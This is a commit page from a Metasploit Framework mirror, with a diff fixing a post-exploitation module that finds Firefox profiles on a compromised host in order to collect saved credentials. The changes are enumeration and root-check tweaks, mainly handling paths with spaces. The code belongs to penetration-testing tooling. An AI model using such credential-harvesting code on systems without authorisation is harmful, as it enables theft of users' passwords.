infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Try harder to get user id, correctly handle dirs with spaces. 

Fixes #7817.
bug/bundler_fix
Pearce Barry 2017-02-20 11:32:20 -06:00
parent dad21b1c1d
commit 37066acc03
No known key found for this signature in database
GPG Key ID: 0916F4DEA5C5DE0A
1 changed files with 22 additions and 12 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

34
modules/post/multi/gather/firefox_creds.rb
View File

@ -146,7 +146,7 @@ class MetasploitModule < Msf::Post
omnija = read_file(@paths['ff'] + org_file)
if omnija.nil? or omnija.empty? or omnija =~ /No such file/i
print_error("Could not download: #{@paths['ff'] + org_file}")
print_error("Tip: Try swtiching to a meterpreter shell if possible (as its more reliable/stable when downloading)") if session.type != "meterpreter"
print_error("Tip: Try switching to a meterpreter shell if possible (as it's more reliable/stable when downloading)") if session.type != "meterpreter"
return
end
@ -249,8 +249,8 @@ class MetasploitModule < Msf::Post
if got_root
vprint_status("Detected ROOT privileges. Searching every account on the target system.")
userdirs = cmd_exec("find #{home} -maxdepth 1 -mindepth 1 2>/dev/null").gsub(/\s/, "\n")
userdirs << "/root\n"
userdirs = "/root\n"
userdirs << cmd_exec("find #{home} -maxdepth 1 -mindepth 1 -type d 2>/dev/null")
else
vprint_status("Checking #{id}'s Firefox account")
userdirs = "#{home + id}\n"
@ -260,16 +260,16 @@ class MetasploitModule < Msf::Post
dir.chomp!
next if dir == "." or dir == ".." or dir =~ /No such file/i
@platform == :osx ? (basepath = "#{dir}/Library/Application\\ Support/Firefox/Profiles/") : (basepath = "#{dir}/.mozilla/firefox/")
@platform == :osx ? (basepath = "#{dir}/Library/Application Support/Firefox/Profiles") : (basepath = "#{dir}/.mozilla/firefox")
print_status("Checking for Firefox profile in: #{basepath}")
checkpath = cmd_exec("ls #{basepath}").gsub(/\s/, "\n")
checkpath = cmd_exec("find " + basepath.gsub(/ /, "\\ ") + " -maxdepth 1 -mindepth 1 -type d 2>/dev/null")
checkpath.each_line do |ffpath|
ffpath.chomp!
if ffpath =~ /\.default/
vprint_good("Found profile: #{basepath + ffpath}")
paths << "#{basepath + ffpath}"
if ffpath =~ /\.default$/
vprint_good("Found profile: #{ffpath}")
paths << "#{ffpath}"
end
end
end
@ -332,7 +332,7 @@ class MetasploitModule < Msf::Post
profile = path.scan(/Profiles[\\|\/](.+)\.(.+)$/).flatten[0].to_s
profile = path.scan(/firefox[\\|\/](.+)\.(.+)$/).flatten[0].to_s if profile.empty?
session.type == "meterpreter" ? (files = session.fs.dir.foreach(path)) : (files = cmd_exec("ls #{path} 2>/dev/null").split())
session.type == "meterpreter" ? (files = session.fs.dir.foreach(path)) : (files = cmd_exec("find "+ path.gsub(/ /, "\\ ") + " -maxdepth 1 -mindepth 1 -type f 2>/dev/null").gsub(/.*\//, "").split("\n"))
files.each do |file|
file.chomp!
@ -551,12 +551,18 @@ Components.utils.import("resource://gre/modules/XPCOMUtils.jsm");
when :unix
# Assuming userdir /home/(x) = user
print_status("Enumerating users")
users = cmd_exec("ls /home 2>/dev/null")
if users.nil? or users.empty?
homedirs = cmd_exec("find /home -maxdepth 1 -mindepth 1 -type d 2>/dev/null").gsub(/.*\//, "")
if homedirs.nil? or homedirs.empty?
print_error("No normal user found")
return false
end
user = users.split[0]
user = nil
# Skip home directories which contain a space, as those are likely not usernames...
homedirs.each_line do |homedir|
user = homedir.chomp
break unless user.index(" ")
end
# Since we can't access the display environment variable we have to assume the default value
args.insert(0, "\"#{@paths['ff']}firefox --display=:0 ")
args << "\""
@ -719,6 +725,10 @@ Components.utils.import("resource://gre/modules/XPCOMUtils.jsm");
session.sys.config.getuid =~ /SYSTEM/ ? true : false
else # unix, bsd, linux, osx
id_output = cmd_exec("id").chomp
if id_output.blank?
# try an absolute path
id_output = cmd_exec("/usr/bin/id").chomp
end
id_output.include?("uid=0(") ? true : false
end
end